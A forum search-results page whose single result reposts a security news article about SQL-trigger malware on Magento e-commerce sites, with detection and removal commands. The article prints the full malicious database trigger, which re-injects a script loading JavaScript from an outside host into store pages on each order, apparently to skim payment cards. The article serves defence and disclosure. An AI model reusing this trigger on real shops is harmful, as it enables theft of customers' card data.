Jump to content
Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble

Search the Community

Showing results for tags 'malware'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • ΓΕΝΙΚΑ
    • Κανόνες λειτουργίας
    • Ανακοινώσεις
    • Σχετικά με το forum
    • Χώρος υποδοχής νέων μελών
    • Γενική συζήτηση
    • Ειδήσεις από τον χώρο του Design και Hosting
    • Ψηφοφορίες
  • HOSTING - SERVERS
    • Virtual private servers
    • Dedicated servers
    • Cloud servers
    • Domains
    • DNS
    • Emails
    • Πιστοποιητικά ασφαλείας SSL
    • Server Control panels
    • Hosting security alert
    • Στοιχεία ελληνικών εταιριών
    • Προσφορές και εκπτώσεις
  • DESIGN - DEVELOPMENT
    • Dreamweaver
    • Photoshop
    • Logos - headers - footers - backgrounds
    • Typography
    • Html
    • Css
    • Php
    • Javascript
    • Jquery
    • Διάφορες άλλες γλώσσες προγραμματισμού
  • ESHOPS - CMS - FORUMS
    • Magento eshop
    • Presta eshop
    • Opencart eshop
    • Wordpress cms
    • Joomla cms
    • Invision forum
    • Vbulletin forum
    • Διάφορες άλλες πλατφόρμες
  • SOFTWARE - SCRIPTS
    • Apache
    • Nginx
    • Mysql - MariaDB - Percona
    • Firewalls
    • Αυτοματοποιημένα scripts
    • Διαχείριση Linux server
    • Διαχείριση Windows server
  • ΠΑΡΟΥΣΙΑΣΗ
    • Θέλετε την γνώμη των άλλων για την σελίδα σας;
  • E-MARKET
    • Αναζήτηση γραφίστα
    • Αναζήτηση προγραμματιστή
    • Αναζήτηση διαχειριστή
    • Αναζήτηση συνεργάτη ανά μήνα ή για μόνιμη εργασία
    • ΕΠΕΙΓΟΝ ΒΟΗΘΕΙΑ

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Website

Found 1 result

  1. Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database. Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL. The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page. The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape. “The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot. “This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.” The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites. In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags). echo 'SHOW TRIGGERS' | n98-magerun db:console Once discovered the malicious trigger it is possible to delete it with a command like the following one: echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop. Below the pattern discovered by Jeroen Boersma: TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW BEGIN UPDATE core_config_data SET value = IF( value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', value, CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ) WHERE path='design/head/includes' OR path='design/footer/absolute_footer' OR path='design/footer/copyright';\ UPDATE cms_block SET content= IF( content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', content, CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ); END; de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware. http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
×